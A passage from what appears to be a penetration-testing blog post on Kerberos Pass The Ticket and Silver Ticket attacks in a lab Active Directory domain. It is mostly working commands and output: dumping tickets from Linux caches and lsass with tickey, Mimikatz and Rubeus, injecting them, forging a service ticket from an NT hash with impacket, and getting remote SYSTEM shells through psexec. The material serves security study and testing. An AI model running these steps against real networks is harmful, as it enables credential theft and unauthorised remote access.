Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\velociraptor

C:\Windows\system32&gt;
</code></pre>
<p>In case of not passing the parameter <em>/ptt</em> to <em>Rubeus asktgt</em>, the ticket will be shown in base64. The following Powershell command can be used to write it into a file:</p>
<pre><code class="language-shell">[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String(""))
</code></pre>
<p>As this is a little cumbersome, I expect that the program will automatically save the ticket in future versions. After that, the command <code>Rubeus ptt /ticket:</code> can be used to inject that ticket.</p>
<h3>Pass The Ticket (PTT)</h3>
<p>This kind of attack is similar to Pass the Key, but instead of using hashes to request for a ticket, the ticket itself is stolen and used to authenticate as its owner. The way of recolecting these tickets changes from Linux to Windows machines, therefore each process will be introduced in its own section.</p>
<h4>Harvesting tickets from Linux</h4>
<p>On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:</p>
<ul>
<li>Files, by default under /tmp directory, in the form of krb5cc_%{uid}.</li>
<li>Kernel Keyrings, an special space in the Linux kernel provided for storing keys.</li>
<li>Process memory, used when only one process needs to use the tickets.</li>
</ul>
<p>To verify what type of storage is used in a specific machine, the variable <em>default_ccache_name</em> must be checked in the /etc/krb5.conf file, which by default has read permission to any user. In case of this parameter being missing, its default value is <em>FILE:/tmp/krb5cc_%{uid}</em>.</p>
<p>Hence, tickets are usually saved in files, which can only be read by the owner and, like any file in Linux, by root. In case of having access to those ticket files, just with copy-pasting them into another machine, they can be used to perform Pass The Ticket attacks.</p>
<p>Example of tickets in a Linux server:</p>
<pre><code class="language-shell">[<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9fedf0f0ebdfd3fefdb2d3ccc9afae">[email&#160;protected]</a>]# ls -lah /tmp/krb5*
-rw-------. 1 root         root         1.4K Mar  5 16:25 /tmp/krb5cc_0
-rw-------. 1 trex         domain users 1.2K Mar  7 10:08 /tmp/krb5cc_1120601113_ZFxZpK
-rw-------. 1 velociraptor domain users  490 Mar  7 10:14 /tmp/krb5cc_1120601115_uDoEa0
</code></pre>
<p>In order to extract tickets from the other 2 sources (keyrings and processes), a great paper, <a href="https://rp.os3.nl/2016-2017/p97/report.pdf" rel="nofollow">Kerberos Credential Thievery (GNU/Linux)</a>, released in 2017, explains ways of recovering the tickets from them.</p>
<p>Moreover, the paper also contains several scripts to substract tickets from remote machines. In the case of keyrings, their script heracles.sh can be used. In the case of a process holding the tickets, a memory analysis is required to found the tickets inside.</p>
<p>Furthermore, I have developed a tool in C based on the heracles.sh script called <a href="https://github.com/TarlogicSecurity/tickey" rel="nofollow">tickey</a>, to extract tickets from keyrings. The tool was created because the command keyctl, heavily used by heracles.sh, is not installed by default in Linux systems, so a direct call to the keyctl syscall can solve this problem.</p>
<p>Moreover, tickets in session or user keyrings only can be accesed by the owner user in the same session. Therefore, when tickey is executed as root, it searchs for another user sessions and injects itself in each one of them in order to retrieve those tickets.</p>
<p>An example of tickey output is shown below:</p>
<pre><code class="language-shell">[<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fc8e939388bcb09d9ed1b0afaacccd">[email&#160;protected]</a> /]# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in trex[1120601113] session...
[+] Successful injection at process 21866 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
[*] Trying to inject in velociraptor[1120601115] session...
[+] Successful injection at process 20752 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
[X] [uid:0] Error retrieving tickets
[<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3644595942767a57541b7a65600607">[email&#160;protected]</a> /]# klist  /tmp/__krb_1120601113.ccache
Ticket cache: FILE:/tmp/__krb_1120601113.ccache
Default principal: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a8dcdacdd0e8e2fdfae9fbfbe1eb86f8e9fae3">[email&#160;protected]</a>

Valid starting       Expires              Service principal
05/09/2019 15:48:36  05/10/2019 01:48:36  krbtgt/<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="98d2cdcad9cbcbd1dbb6c8d9cad3d8d2cdcad9cbcbd1dbb6c8d9cad3">[email&#160;protected]</a>
        renew until 05/10/2019 15:48:32
</code></pre>
<h4>Harvesting tickets from Windows</h4>
<p>In Windows, tickets are handled and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to communicate with lsass and ask for them. As a non-administrative user only owned tickets can be fetched, however, as machine administrator, all of them can be harvested. For this purpose, the tools Mimikatz or Rubeus can be used as shown below:</p>
<p>Mimikatz harvesting:</p>
<pre><code class="language-shell">PS C:\Users\velociraptor&gt; .\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4321262d29222e2a2d0324262d372a2f282a342a6d202c2e">[email&#160;protected]</a> )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6e1807000d0b001a40020b1a011b162e09030f0702400d0103">[email&#160;protected]</a> )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # sekurlsa::tickets /export

...
&lt;-----Mimikatz Output-----&gt;
...

Authentication Id : 0 ; 42211838 (00000000:028419fe)
Session           : RemoteInteractive from 2
User Name         : trex
Domain            : JURASSIC
Logon Server      : LAB-WDC01
Logon Time        : 28/02/2019 12:14:43
SID               : S-1-5-21-1339291983-1349129144-367733775-1113

         * Username : trex
         * Domain   : JURASSIC.PARK
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 05/03/2019 9:48:37 ; 05/03/2019 19:15:59 ; 07/03/2019 12:14:43
           Service Name (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK
           Target Name  (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK
           Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             bd16db915bdfb0af3d57509bdea3d92bf8f0ef9976a16ebb6510111597c6d8b6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;28419fe]<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="dcf1ecf1ecf1e8ecbde9ececececf1a8aeb9a49c90989d8cf190bdbef18b989feceef2b6a9aebdafafb5bff2acbdaeb7f2b7b5aebeb5">[email&#160;protected]</a> !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 28/02/2019 12:14:43 ; 28/02/2019 22:14:43 ; 07/03/2019 12:14:43
           Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK
           Target Name  (--) : @ JURASSIC.PARK
           Client Name  (01) : trex ; @ JURASSIC.PARK ( $$Delegation Ticket$$ )
           Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             21666ffd3511fb2d1e127ad96e322c3a6e8be644eabba4821ba5c425b4a58842
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;28419fe]<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="78554a5548554e48194848484848550c0a1d0038130a1a0c1f0c55322d2a392b2b313b5628392a335613110a1a11">[email&#160;protected]</a> !
         [00000001]
           Start/End/MaxRenew: 05/03/2019 9:15:59 ; 05/03/2019 19:15:59 ; 07/03/2019 12:14:43
           Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK
           Target Name  (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK
           Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )
           Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f79644af74ade15f4178e5cea3b0ce071b601f78ef4b11c09ed971142dd3bb50
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;28419fe]<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="dcf1eef1edf1e8ecb9ecececececf1a8aeb9a49cb7aebea8bba8f196898e9d8f8f959ff28c9d8e97f2b7b5aebeb5">[email&#160;protected]</a> !

...
&lt;-----Mimikatz Output-----&gt;
...
           
mimikatz # exit
Bye!
</code></pre>
<p>Rubeus harvesting in powershell:</p>
<pre><code class="language-shell">PS C:\Users\Administrator&gt; .\Rubeus dump

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2



[*] Action: Dump Kerberos Ticket Data (All Users)


  UserName                 : Administrator
  Domain                   : JURASSIC
  LogonId                  : 0xdee0cb2
  UserSID                  : S-1-5-21-1339291983-1349129144-367733775-500
  AuthenticationPackage    : Kerberos
  LogonType                : RemoteInteractive
  LogonTime                : 07/03/2019 12:35:47
  LogonServer              : LAB-WDC01
  LogonServerDNSDomain     : JURASSIC.PARK
  UserPrincipalName        : <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="94d5f0f9fdfafde7e0e6f5e0fbe6d4fee1e6f5e7e7fdf7bae4f5e6ff">[email&#160;protected]</a>

...
&lt;-----Rubeus Output-----&gt;
...

    ServiceName              : krbtgt/JURASSIC.PARK
    TargetName               : krbtgt/jurassic.park
    ClientName               : trex
    DomainName               : JURASSIC.PARK
    TargetDomainName         : JURASSIC.PARK
    AltTargetDomainName      : JURASSIC.PARK
    SessionKeyType           : aes256_cts_hmac_sha1
    Base64SessionKey         : 1gokewLDdgqAnN3a1KNR15q3GaZM3duydjLfb037KLs=
    KeyExpirationTime        : 01/01/1601 1:00:00
    TicketFlags              : pre_authent, initial, renewable, forwardable
    StartTime                : 07/03/2019 16:28:23
    EndTime                  : 08/03/2019 2:28:23
    RenewUntil               : 14/03/2019 16:28:23
    TimeSkew                 : 0
    EncodedTicketSize        : 1284
    Base64EncodedTicket      :

      doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0
      Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV/Pd
      wUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0
      JevqulePfTUSxXJ/gNvP6JCQGAf+zUL12dqGkqyq//TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd
      4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzD
      Qkrx4/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM/XA8vPAL1KDGyux+ojkVDAl/Kezqg6DWtLZO86Rpb7L7LRvk8jX/4Y4Yi0T
      MlsZjahwXn1N3ZulUiF7pvYzh9es9MkS/X/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf/pmP1rl5uON
      hMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5
      FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu
      91D0ULl3wdvbEhh89hPAy1AHEWLtAth55/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQ
      hxi/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7e
      os6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh/RqQhGs9UKSjp6/Q7EhMCd90J
      UDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH/xC9uD97VkH2mQ8jnFHHxseUle2
      qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG
      4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9v
      Tfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAx
      OTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJB
      U1NJQy5QQVJL


...
&lt;-----Rubeus Output-----&gt;
...

[*] Enumerated 23 total tickets
[*] Extracted  23 total tickets

PS C:\Users\Administrator&gt; [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV/PdwUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0JevqulePfTUSxXJ/gNvP6JCQGAf+zUL12dqGkqyq//TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzDQkrx4/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM/XA8vPAL1KDGyux+ojkVDAl/Kezqg6DWtLZO86Rpb7L7LRvk8jX/4Y4Yi0TMlsZjahwXn1N3ZulUiF7pvYzh9es9MkS/X/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf/pmP1rl5uONhMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu91D0ULl3wdvbEhh89hPAy1AHEWLtAth55/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQhxi/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7eos6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh/RqQhGs9UKSjp6/Q7EhMCd90JUDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH/xC9uD97VkH2mQ8jnFHHxseUle2qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9vTfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAxOTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJBU1NJQy5QQVJL"))
</code></pre>
<p>And finally, after executing any of those tools, tickets are dumped, ready to use except for those expired.</p>
<h4>Swaping Linux and Windows tickets between platforms</h4>
<p>Before start using the tickets, it is important to have them in the proper format, due to Windows and Linux using different approaches to save them. In order to convert from ccache (Linux file format) to kirbi (Windows file format used by Mimikatz and Rubeus), and vice versa, the following tools can be used:</p>
<ul>
<li>The <a href="https://github.com/Zer1t0/ticket_converter" rel="nofollow">ticket_converter</a> script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:</li>
</ul>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="62100d0d162209030e0b">[email&#160;protected]</a>:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache =&gt; kirbi
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="93e1fcfce7d3f8f2fffa">[email&#160;protected]</a>:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi =&gt; ccache
</code></pre>
<ul>
<li><a href="https://github.com/gentilkiwi/kekeo" rel="nofollow">Kekeo</a>, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.</li>
</ul>
<h4>From Linux</h4>
<p>To perform the pass the ticket attack by using psexec.py from impacket, just do the following:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="dfadb0b0ab9fb4beb3b6">[email&#160;protected]</a>:impacket-examples# export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK 
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="ff8d90908bbf949e9396">[email&#160;protected]</a>:impacket-examples# python psexec.py jurassic.park/<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="156167706d5579747762626625273b7f60677466667c763b6574677e">[email&#160;protected]</a> -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file SptvdLDZ.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service zkNG on labwws02.jurassic.park.....
[*] Starting service zkNG.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;

</code></pre>
<p>As with PTK attacks, in order to use a ticket with any impacket tool, just specify the KRB5CCNAME environment variable and the <em>-no-pass -k</em> parameters.</p>
<p>While performing this technique, an error was shown by impacket: <em>[-] SMB SessionError: STATUS_ACCESS_DENIED&#8230;</em>, even if the user had access to the remote machine. This issue was caused by the fact that a ticket without the A flag (pre-authenticated) was used, because that domain user did not need Kerberos pre-authentication. To check ticket flags in Linux, the command <em>klist -f </em> can be used, which is part of the krb5 package. Example:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="5d2f3232291d363c3134">[email&#160;protected]</a>:impacket-examples# klist -f -c krb5cc_1120601113_ZFxZpK
Ticket cache: FILE:krb5cc_1120601113_ZFxZpK
Default principal: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d7a1b2bbb8b4bea5b6a7a3b8a5979d82859684849e94f98796859c">[email&#160;protected]</a>

Valid starting     Expires            Service principal
03/07/19 11:08:45  03/07/19 21:08:45  krbtgt/<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9bd1cec9dac8c8d2d8b5cbdac9d0dbd1cec9dac8c8d2d8b5cbdac9d0">[email&#160;protected]</a>
	renew until 03/08/19 11:08:41, Flags: RIA
</code></pre>
<h4>From Windows</h4>
<p>In a Windows machine, Rubeus or Mimikatz can be used in order to inject tickets in the current session, no special privileges are required to accomplish this task. After that, it is possible to use a tool like PsExec to execute commands in remote machines as the new user. Example executions of both tools are shown below:</p>
<p>Mimikatz example:</p>
<pre><code class="language-shell">PS C:\Users\velociraptor&gt; .\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="1173747f7b707c787f5176747f65787d7a7866783f727e7c">[email&#160;protected]</a> )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="ddabb4b3beb8b3a9f3b1b8a9b2a8a59dbab0bcb4b1f3beb2b0">[email&#160;protected]</a> )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # kerberos::ptt [0;28419fe]<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="200d120d110d14104510101010100d54524558604b52425447540d6a757261737369630e7061726b0e4b49524249">[email&#160;protected]</a>

* File: '[0;28419fe]<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="49647b6478647d792c7979797979643d3b2c3109223b2b3d2e3d64031c1b081a1a000a6719081b026722203b2b20">[email&#160;protected]</a>': OK

mimikatz # exit
Bye!
PS C:\Users\velociraptor&gt; klist

Current LogonId is 0:0x34f9571

Cached Tickets: (1)

#0&gt;     Client: trex @ JURASSIC.PARK
        Server: krbtgt/JURASSIC.PARK @ JURASSIC.PARK
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent
        Start Time: 3/5/2019 9:15:59 (local)
        End Time:   3/5/2019 19:15:59 (local)
        Renew Time: 3/7/2019 12:14:43 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96

PS C:\Users\velociraptor&gt; .\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\trex

C:\Windows\system32&gt;
</code></pre>
<p>Rubeus example:</p>
<pre><code class="language-shell">C:\Users\velociraptor&gt;.\Rubeus.exe ptt /ticket:[0;28419fe]<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="5578677864786165306565656565782127302d153e2737213221781f00071406061c167b0514071e7b3e3c27373c">[email&#160;protected]</a>

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\velociraptor&gt;klist

Current LogonId is 0:0x34f958e

Cached Tickets: (1)

#0&gt;     Client: trex @ JURASSIC.PARK
        Server: krbtgt/JURASSIC.PARK @ JURASSIC.PARK
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent
        Start Time: 3/5/2019 9:15:59 (local)
        End Time:   3/5/2019 19:15:59 (local)
        Renew Time: 3/7/2019 12:14:43 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96


C:\Users\velociraptor&gt;.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\trex

C:\Windows\system32&gt;
</code></pre>
<p>After injecting the ticket of a user account, it is possible to act on behalf of that user in remote machines, but not in the local one, where Kerberos doesn&#8217;t apply. Remember that TGT tickets are more useful than TGS ones, as they are not restricted to one service only.</p>
<h3>Silver ticket</h3>
<p>The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of a user account is owned. Thus, it is possible to gain access to that service by forging a custom TGS with the maximum privileges inside it.</p>
<p>In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service.</p>
<p>It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256), which are calculated from the password as well, and can be used by Impacket and Mimikatz to craft the tickets. Moreover, these keys, unlike the NTLM hash, are salted with the domain and username. In order to know more about how this keys are calculated, it is recommended to read the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625" rel="nofollow">section 4.4 of MS-KILE</a> or the <a href="https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372" rel="nofollow">Get-KerberosAESKey.ps1</a> script.</p>
<h4>From Linux</h4>
<p>As usual, it is possible to perform these attacks from a Linux machine by using the examples provided by impacket. In this case ticketer.py is used to forge a TGS:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="8efce1e1facee5efe2e7">[email&#160;protected]</a>:impacket-examples# python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park  stegosaurus
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for jurassic.park/stegosaurus
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in stegosaurus.ccache
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="addfc2c2d9edc6ccc1c4">[email&#160;protected]</a>:impacket-examples# export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache 
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="65170a0a11250e04090c">[email&#160;protected]</a>:impacket-examples# python psexec.py jurassic.park/<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="31424554565e425044434442715d505346464201031f5b444350424258521f4150435a">[email&#160;protected]</a> -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file JhRQHMnu.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service Drvl on labwws02.jurassic.park.....
[*] Starting service Drvl.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;
</code></pre>
<p>Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, it is possible to set the ticket in the KRB5CCNAME environment variable and use it with the <em>-no-pass -k</em> parameters in any of the impacket examples.</p>
<h4>From Windows</h4>
<p>In Windows, <a href="https://github.com/gentilkiwi/mimikatz" rel="nofollow">Mimikatz</a> can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec. It must be taken into account that tickets can be forged in a local machine, which is not in the target network, and after that send it to a machine in the network to inject it. An execution example is shown below:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="593b3c373338343037193e3c372d303532302e30773a3634">[email&#160;protected]</a> )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
